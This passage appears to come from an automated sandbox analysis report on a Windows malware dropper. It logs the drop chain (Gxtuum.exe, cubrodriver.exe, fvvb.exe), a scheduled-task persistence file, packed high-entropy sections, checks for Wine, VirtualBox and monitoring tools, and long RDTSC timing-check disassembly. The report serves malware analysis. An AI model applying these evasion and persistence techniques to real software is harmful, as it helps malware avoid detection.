                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: mstask.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: mstask.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: mpr.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: apphelp.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: winmm.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: uxtheme.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: kernel.appcore.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: mstask.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: textinputframework.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: coreuicomponents.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: coremessaging.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: ntmarta.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: wintypes.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: wintypes.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: wintypes.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: wsock32.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: mswsock.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: dnsapi.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: iphlpapi.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: fwpuclnt.dll
                          Source: C:\ProgramData\giab\fvvb.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: Fp80Ocyhqm.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Fp80Ocyhqm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Fp80Ocyhqm.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: Fp80Ocyhqm.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: Fp80Ocyhqm.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: Fp80Ocyhqm.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: Fp80Ocyhqm.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Unpacked PE file: 5.2.cubrodriver.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;
                          Source: C:\ProgramData\giab\fvvb.exe Unpacked PE file: 6.2.fvvb.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;
                          Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                          Source: cubrodriver.exe.1.dr Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
                          Source: fvvb.exe.5.dr Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
                          Source: Fp80Ocyhqm.exe Static PE information: real checksum: 0x0 should be: 0x73d64
                          Source: cubrodriver[1].exe.1.dr Static PE information: real checksum: 0x1ac12a should be: 0x1b2325
                          Source: Gxtuum.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x73d64
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: (empty)
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: .idata
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: (empty)
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: yuxfscdw
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: oiahzgmh
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: .taggant
                          Source: cubrodriver.exe.1.dr Static PE information: section name: (empty)
                          Source: cubrodriver.exe.1.dr Static PE information: section name: .idata
                          Source: cubrodriver.exe.1.dr Static PE information: section name: (empty)
                          Source: cubrodriver.exe.1.dr Static PE information: section name: yuxfscdw
                          Source: cubrodriver.exe.1.dr Static PE information: section name: oiahzgmh
                          Source: cubrodriver.exe.1.dr Static PE information: section name: .taggant
                          Source: fvvb.exe.5.dr Static PE information: section name: (empty)
                          Source: fvvb.exe.5.dr Static PE information: section name: .idata
                          Source: fvvb.exe.5.dr Static PE information: section name: (empty)
                          Source: fvvb.exe.5.dr Static PE information: section name: yuxfscdw
                          Source: fvvb.exe.5.dr Static PE information: section name: oiahzgmh
                          Source: fvvb.exe.5.dr Static PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Code function: 0_2_0008A063 push ecx; ret 0_2_0008A076
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Code function: 0_2_000772EF pushad ; iretd 0_2_000772F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_0043A063 push ecx; ret 1_2_0043A076
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_004272EF pushad ; iretd 1_2_004272F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_0043A063 push ecx; ret 3_2_0043A076
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_004272EF pushad ; iretd 3_2_004272F0
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: (empty) entropy: 7.799208910449233
                          Source: cubrodriver[1].exe.1.dr Static PE information: section name: yuxfscdw entropy: 7.952071105223017
                          Source: cubrodriver.exe.1.dr Static PE information: section name: (empty) entropy: 7.799208910449233
                          Source: cubrodriver.exe.1.dr Static PE information: section name: yuxfscdw entropy: 7.952071105223017
                          Source: fvvb.exe.5.dr Static PE information: section name: (empty) entropy: 7.799208910449233
                          Source: fvvb.exe.5.dr Static PE information: section name: yuxfscdw entropy: 7.952071105223017
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe File created: C:\ProgramData\giab\fvvb.exe
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cubrodriver[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe File created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe File created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe File created: C:\ProgramData\giab\fvvb.exe

                          Boot Survival

                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Window searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Window searched: window name: RegmonClass
                          Source: C:\ProgramData\giab\fvvb.exe | Window searched: window name: FilemonClass
                          Source: C:\ProgramData\giab\fvvb.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\giab\fvvb.exe | Window searched: window name: RegmonClass
                          Source: C:\ProgramData\giab\fvvb.exe | Window searched: window name: Regmonclass
                          Source: C:\ProgramData\giab\fvvb.exe | Window searched: window name: Filemonclass
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | File created: C:\Windows\Tasks\Gxtuum.job
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0008918F
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\ProgramData\giab\fvvb.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\giab\fvvb.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C5241 second address: 5C5247 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C5247 second address: 5C5266 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F01B44E8C96h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F01B44E8C9Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C7182 second address: 5C7186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C6323 second address: 5C6339 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F01B44E8CA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C6339 second address: 5C633D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C633D second address: 5C6341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C8117 second address: 5C811D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C6341 second address: 5C63D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 jmp 00007F01B44E8C9Bh 0x0000000d cld 0x0000000e popad 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F01B44E8C98h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+1247D614h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d add edi, dword ptr [ebp+122D2AA6h] 0x00000043 mov eax, dword ptr [ebp+122D013Dh] 0x00000049 pushad 0x0000004a mov dword ptr [ebp+122D2341h], edi 0x00000050 mov ebx, dword ptr [ebp+122D2AFAh] 0x00000056 popad 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ecx 0x0000005c call 00007F01B44E8C98h 0x00000061 pop ecx 0x00000062 mov dword ptr [esp+04h], ecx 0x00000066 add dword ptr [esp+04h], 00000014h 0x0000006e inc ecx 0x0000006f push ecx 0x00000070 ret 0x00000071 pop ecx 0x00000072 ret 0x00000073 mov edi, dword ptr [ebp+122D2EA5h] 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push ebx 0x0000007d jnc 00007F01B44E8C96h 0x00000083 pop ebx 0x00000084 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C811D second address: 5C8121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5C63D2 second address: 5C63D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CA0DA second address: 5CA0E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CA0E4 second address: 5CA0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CA0EA second address: 5CA0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CB123 second address: 5CB18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F01B44E8C96h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D30BAh], ebx 0x00000013 movsx ebx, bx 0x00000016 push 00000000h 0x00000018 call 00007F01B44E8CA9h 0x0000001d mov edi, dword ptr [ebp+122D25E5h] 0x00000023 pop ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F01B44E8C98h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 push edi 0x00000042 je 00007F01B44E8C9Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CB29B second address: 5CB2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F01B4D45EE5h 0x0000000f pop ebx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CB2BB second address: 5CB308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr fs:[00000000h] 0x00000010 mov dword ptr [ebp+12462866h], eax 0x00000016 mov edi, 7C1C5FB0h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 29019EC6h 0x00000027 mov eax, dword ptr [ebp+122D116Dh] 0x0000002d jnc 00007F01B44E8C9Ch 0x00000033 mov edi, dword ptr [ebp+122D2BADh] 0x00000039 push FFFFFFFFh 0x0000003b mov di, 9109h 0x0000003f nop 0x00000040 pushad 0x00000041 jnp 00007F01B44E8C98h 0x00000047 push edx 0x00000048 pop edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CB308 second address: 5CB30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CF351 second address: 5CF357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CF357 second address: 5CF3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F01B4D45ED8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov bl, C2h 0x00000023 adc bh, FFFFFFEAh 0x00000026 sub dword ptr [ebp+122D1D79h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F01B4D45ED8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D2DEEh], esi 0x0000004e push 00000000h 0x00000050 mov ebx, 30436C9Ah 0x00000055 xchg eax, esi 0x00000056 jmp 00007F01B4D45EE3h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jc 00007F01B4D45EDCh 0x00000064 jng 00007F01B4D45ED6h 0x0000006a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CD3BC second address: 5CD3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CD3C3 second address: 5CD3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CC331 second address: 5CC335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CD3C9 second address: 5CD3E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F01B4D45ED6h 0x00000012 jns 00007F01B4D45ED6h 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D0382 second address: 5D0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F01B44E8C98h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 stc 0x00000028 mov dword ptr [ebp+122D37EAh], ebx 0x0000002e push 00000000h 0x00000030 jnl 00007F01B44E8CA2h 0x00000036 add edi, dword ptr [ebp+122D2ADAh] 0x0000003c push 00000000h 0x0000003e mov bx, 6FB1h 0x00000042 xchg eax, esi 0x00000043 js 00007F01B44E8CA4h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jl 00007F01B44E8C96h 0x00000053 jmp 00007F01B44E8CA6h 0x00000058 popad 0x00000059 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D0417 second address: 5D041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CE4C7 second address: 5CE4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F01B44E8C9Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F01B44E8C9Bh 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CF573 second address: 5CF5F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F01B4D45ED8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov bl, 3Ch 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F01B4D45EE6h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b and ebx, dword ptr [ebp+122D1B43h] 0x00000041 mov eax, dword ptr [ebp+122D1605h] 0x00000047 mov ebx, 547AEAFCh 0x0000004c push FFFFFFFFh 0x0000004e mov ebx, edx 0x00000050 or dword ptr [ebp+122D33E5h], edi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push ecx 0x0000005b pop ecx 0x0000005c jmp 00007F01B4D45EDAh 0x00000061 popad 0x00000062 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5CF5F4 second address: 5CF5F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D2408 second address: 5D2414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D2414 second address: 5D2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D2418 second address: 5D241E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D2589 second address: 5D258D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D258D second address: 5D2603 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F01B4D45ED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1B43h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, dword ptr [ebp+1247D614h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov bx, si 0x0000002a mov eax, dword ptr [ebp+122D0051h] 0x00000030 mov dword ptr [ebp+1244D121h], ecx 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F01B4D45ED8h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 sbb edi, 42F68912h 0x00000058 or edi, dword ptr [ebp+122D1B34h] 0x0000005e push eax 0x0000005f jc 00007F01B4D45EE0h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D3671 second address: 5D3677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D3677 second address: 5D367B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D367B second address: 5D369E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8CA8h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D369E second address: 5D36A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
